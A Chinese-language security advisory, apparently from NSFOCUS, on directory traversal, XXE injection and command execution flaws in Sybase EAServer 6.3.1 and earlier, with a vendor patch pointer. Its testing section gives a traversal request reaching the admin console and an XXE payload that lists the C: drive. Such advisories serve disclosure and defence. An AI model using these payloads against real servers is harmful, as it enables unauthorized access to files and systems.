首页 -> 安全研究

安全研究

安全漏洞
Sybase EAServer多个安全漏洞

发布日期:2013-07-19
更新日期:2013-07-22

受影响系统:
Sybase EAServer <=6.3.1
描述:
BUGTRAQ  ID: 61358

Sybase EAServer是高性能、可伸缩、安全、开放的应用服务器,适用于适用多层架构的电子门户和互联商务解决方案。

Sybase EAServer 6.3.1及更早版本存在目录遍历、XML外部实体注入、命令执行等多个安全漏洞,成功利用后可允许攻击者在受影响计算机上下载和上传任意文件,获取敏感信息并以当前用户权限执行任意命令。

<*来源:Gerhard Wagner
        Bernhard Mueller
  
  链接:http://seclists.org/bugtraq/2013/Jul/133
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

1) 目录遍历
下列请求允许访问Sybase EAServer管理应用:

https://example.com/myapp/%5C../console/Login.jsp

也可访问Sybase EAServer自带的其他应用:

/rest
/wsh
/wsf
...



2) XML实体注入
下列XML消息显示了Windows上C:的内容:
system:

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///C:\">]>

<lol>
<dt>
<stringValue>&xxe;</stringValue>
<booleanValue>0</booleanValue>
</dt>
</lol>



3) OS命令执行

建议:
厂商补丁:

Sybase
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.sybase.com/support

浏览次数:3955
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障